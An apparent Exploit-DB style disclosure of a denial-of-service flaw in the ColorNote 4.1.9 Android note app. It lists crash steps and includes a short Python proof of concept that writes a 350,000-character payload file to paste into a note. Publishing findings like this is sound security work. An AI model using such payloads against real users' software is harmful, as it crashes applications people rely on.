# Exploit Title: ColorNote 4.1.9 - Denial of Service (PoC) # Date: 2021-06-02 # Author: Brian Rodríguez # Download Link: https://play.google.com/store/apps/details?id=com.socialnmobile.dictapps.notepad.color.note&hl=es_MX # Version: 4.1.9 # Category: DoS (Android) ##### Vulnerability ##### Color Note is vulnerable to a DoS condition when a long list of characters is being used. # STEPS # # Open the program # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt in the new note. # Click the "Return" button twice. # Start clicking the screen. # Crashed Successful exploitation will causes application stop working. I have been able to test this exploit against Android 8.0. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")